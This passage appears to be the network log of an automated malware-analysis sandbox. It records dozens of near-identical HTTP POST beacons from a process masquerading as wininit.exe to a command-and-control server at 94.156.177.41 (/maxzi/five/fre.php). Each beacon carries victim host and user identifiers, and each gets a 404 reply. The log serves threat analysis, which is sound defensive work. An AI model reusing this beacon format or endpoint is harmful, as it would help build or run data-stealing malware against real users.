                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              82192.168.2.45875294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:29.215018034 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:29.219984055 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:29.951875925 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:29 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              83192.168.2.45875894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:30.130422115 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:30.135328054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:30.880542994 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:30 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              84192.168.2.45876494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:31.024075031 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:31.029058933 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:31.753091097 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:31 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              85192.168.2.45877094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:31.903326035 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:31.910532951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:32.772454977 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:32 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              86192.168.2.45877794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:32.917339087 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:32.925546885 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:33.662405968 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:33 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              87192.168.2.45878694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:33.812052011 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:33.816973925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:34.540858030 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:34 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              88192.168.2.45879294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:34.742141962 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:34.747067928 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:35.492599010 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:35 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              89192.168.2.45879994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:35.638216972 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:35.646259069 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:36.384644032 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:36 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              90192.168.2.45880694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:36.539042950 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:36.544138908 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:37.276716948 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:37 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              91192.168.2.45881294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:37.432391882 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:37.437340021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:38.177804947 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:38 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              92192.168.2.45881894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:38.332047939 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:38.343066931 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:39.075459003 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:38 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              93192.168.2.45882794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:39.235456944 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:39.243871927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:39.980175018 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:39 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              94192.168.2.45882894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:40.140631914 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:40.146749020 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:40.879949093 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:40 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              95192.168.2.45882994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:41.029660940 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:41.034533024 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:41.780756950 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:41 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              96192.168.2.45883094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:41.937705994 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:41.944293976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:42.700021029 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:42 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              97192.168.2.45883194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:42.855871916 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:42.863234043 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:43.621169090 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:43 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              98192.168.2.45883294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:43.778435946 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:43.784646034 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:44.664953947 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:44 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              99192.168.2.45883394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:45.031275034 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
